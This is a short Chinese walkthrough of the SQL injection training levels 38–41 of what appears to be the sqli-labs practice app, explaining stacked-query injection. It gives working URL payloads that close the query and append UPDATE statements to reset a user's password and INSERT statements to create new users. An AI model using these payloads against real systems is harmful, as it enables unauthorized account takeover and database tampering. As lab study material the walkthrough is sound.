这几关都是堆叠注入的
38关是堆叠注入就类似于一条命令里头执行两个操作
先来个?id=1 Dumb Dumb (字符型)
字符型的那么就?id=1’;(和mysql执行完一条指令后一样以;结尾 )update users set password=’(自己设置)’ where username=’Dumb’; –+
之后再执行一下?id=1就会发现变成Dumb (自己设置)
39 也是堆叠注入 这关是数字型 那么就简单点
?id=1 然后?id=1;insert users values(21,’aaa’,1212’) 直接新增一个用户
?id=21 就可以查看到新增加的用户信息
40闭合方式为?id=1’)
41没有报错然后和39一样数字型
这几关的语句都可以一起用每一关都可以改密码创建新用户 。